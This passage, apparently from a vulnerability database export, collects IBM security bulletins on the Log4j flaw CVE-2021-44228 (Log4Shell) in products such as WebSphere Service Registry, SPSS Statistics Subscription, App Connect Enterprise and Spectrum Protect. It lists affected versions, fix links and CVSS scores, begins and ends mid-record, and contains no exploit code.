(CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU025\",\"label\":\"IBM Cloud and Cognitive Software\"},\"Product\":{\"code\":\"SSXO9Y\",\"label\":\"IBM WebSphere Hybrid Edition\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF012\",\"label\":\"IBM i\"},{\"code\":\"PF017\",\"label\":\"Mac OS\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"all\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T06:51:04", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Applications is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T06:51:04", "id": "0172701FE5FE7C060372C9A6E7199B0E91A4F7E5904E7762F54202A8D4CB9759", "href": "https://www.ibm.com/support/pages/node/6526484", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:01", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM WebSphere Service Registry and Repository. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)| Affected Supporting Product and Version(s) \n---|--- \nWebSphere Service Registry and Repository V8.5| WebSphere Application Server V8.5.5 \n \n## Remediation/Fixes\n\nPlease consult the security bulletin: \n[Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) \nfor vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWLGF\",\"label\":\"WebSphere Service Registry and Repository\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T06:41:43", "type": "ibm", "title": "Security Bulletin: IBM WebSphere Service Registry and Repository is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T06:41:43", "id": "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "href": "https://www.ibm.com/support/pages/node/6526420", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:06", "description": "## Summary\n\nThere is a vulnerability in the version of Log4j that is part of IBM SPSS Statistics Subscription. IBM SPSS Statistics Subscription has addressed this vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSPSS Statistics Subscription| 1.0 \n \n## Remediation/Fixes\n\nAffected Product(s)| Version(s)| Fixes \n---|---|--- \nSPSS Statistics Subscription| 1.0| [Sub-Statistics28-IF002](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Statistics&release=Subscription&platform=All&function=fixId&fixids=Sub-IM-S28STATC-ALL-IF002&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Sub-Statistics28-IF002\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS3PMY\",\"label\":\"IBM SPSS Statistics Subscription\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF017\",\"label\":\"Mac OS\"}],\"Version\":\"1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T20:44:40", "type": "ibm", "title": "Security Bulletin: Log4Shell Vulnerability affects IBM SPSS Statistics Subscription (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T20:44:40", "id": "7E2A7C8E981FCA78A12F6D8992BE35354D42B960D223A90BF210EE5B300BFB9E", "href": "https://www.ibm.com/support/pages/node/6526184", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:17", "description": "## Summary\n\n\"Vulnerabilities in Apache Log4j2 affect the logging infrastructure in the TADataCollector command line tool in IBM App Connect Enterprise v11, v12. IBM App Connect Enterprise V11, V12 have addressed the applicable CVE. Given current information and analysis, IBM Integration Bus v10 and v9 are not affected. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM App Connect Enterprise V11.0.0.7 to V11.0.0.15\n\nIBM App Connect Enterprise V12.0.1.0 to V12.0.3.0\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by applying the patches listed in this table.\n\n**Product**\n\n| \n\n**VRMF**\n\n| APAR| \n\n**Remediation / Fix** \n \n---|---|---|--- \nIBM App Connect Enterprise V12 \n| V12.0.1.0 to V12.0.3.0| \n\nIT39377\n\n| \n\nInterim fix for APAR (IT39377) is available from\n\n[IBM Fix Central (distributed platforms)](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=12.0.1.0&platform=All&function=aparId&apars=IT39377+> \"IBM Fix Central \\(distributed platforms\\)\" )\n\nInterim fix for Windows is available from\n\n[12.0.1.0 IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=12.0.1.0&platform=Windows+64-bit,+x86&function=aparId&apars=IT39377+> \"12.0.1.0 IBM Fix Central\" )\n\n[12.0.2.0 IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=12.0.2.0&platform=Windows+64-bit,+x86&function=aparId&apars=IT39377+> \"12.0.2.0 IBM Fix Central\" )\n\n[12.0.3.0 IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=12.0.3.0&platform=Windows+64-bit,+x86&function=aparId&apars=IT39377+> \"12.0.3.0 IBM Fix Central\" ) \n \nIBM App Connect Enterprise V11| V11.0.0.7 to V11.0.0.15| \n\nIT39377\n\n| \n\nInterim fix for APAR (IT39377) is available for v11.0.0.10-11.0.0.15 from\n\n[IBM Fix Central (distributed platforms)](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=11.0.0.15&platform=All&function=aparId&apars=IT39377+> \"IBM Fix Central \\(distributed platforms\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSDR5J\",\"label\":\"IBM App Connect Enterprise\"},\"Component\":\"-\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"-\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T14:10:20", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j affect IBM App Connect Enterprise V11, V12 (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T14:10:20", "id": "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "href": "https://www.ibm.com/support/pages/node/6527726", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:26", "description": "## Summary\n\nA vulnerability in Apache Log4j could allow an attacker to execute arbitrary code on the system. This vulnerability may affect the Help system in IBM Spectrum Copy Data Management\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Copy Data Management| 2.2.14.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing this vulnerability now by upgrading.\n\n**Note: The below fix package included Log4j 2.15.**\n\n**IBM Spectrum Copy Data Management** \n**Affected Versions**| **Fixing** \n**Level**| **Platform**| **Link to Fix and Instructions \n** \n---|---|---|--- \n2.2.14.0| 2.2.14.1| Linux| <https://www.ibm.com/support/pages/node/6507419> \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 December 2021: Initial Publication \n20 December 2021: Updated Remediation/Fixes section to indicate that the fix package included Log4j 2.15 \n21 December 2021: Updated Affected Versions - only 2.2.14.0 is affected\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU010\",\"label\":\"Systems - Storage\"},\"Product\":{\"code\":\"STDJ4J\",\"label\":\"IBM Spectrum Copy Data Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.2\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T09:15:04", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Copy Data Management (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T09:15:04", "id": "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "href": "https://www.ibm.com/support/pages/node/6527830", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:20", "description": "## Summary\n\nA vulnerability in Apache Log4j could allow an attacker to execute arbitrary code on the system. This vulnerability may affect the IBM Spectrum Protect Client Web GUI and IBM Spectrum Protect for Virtual Environments due to their uses of Log4j for logging of messages and traces. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Protect Backup-Archive Client - see Note 1| \n\n8.1.11.0-8.1.13.0 \n7.1.8.10-7.1.8.12 \n \n \nIBM Spectrum Protect for Virtual Environments: Data Protection for VMware| 8.1.11.0-8.1.13.0 see Note 2 \n7.1.8.10-7.1.8.12 \nIBM Spectrum Protect for Virtual Environments: Data Protection for Hyper-V| 8.1.11.0-8.1.13.0 see Note 2 \n \n \nNote 1: The IBM Spectrum Protect Backup-Archive Client installs the affected log4j files. However, only the Web GUI will use the affected log4j files.\n\nNote 2: The Data Movers in 8.1.11 and above are affected\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing this vulnerability now by upgrading to the fixed level instead of using the manual process described under Workarounds and Mitigations.\n\n**Note: The below fix packages included Log4j 2.15.**\n\n**_IBM Spectrum Protect Client Affected Versions \n_**| **_Fixing \nLevel_**| **_Platform_**| **_Link to Fix and Instructions \n_** \n---|---|---|--- \n8.1.11.0-8.1.13.0 | 8.1.13.1| AIX \nLinux \nWindows| <https://www.ibm.com/support/pages/node/589103> \n7.1.8.10-7.1.8.12| \n\n7.1.8.13\n\n| Linux \nWindows| \n\n<https://www.ibm.com/sup
Security Bulletin: DS8000 Hardware Management Console uses Apache Log4j which is subject to a vulnerability alert CVE-2021-44228.
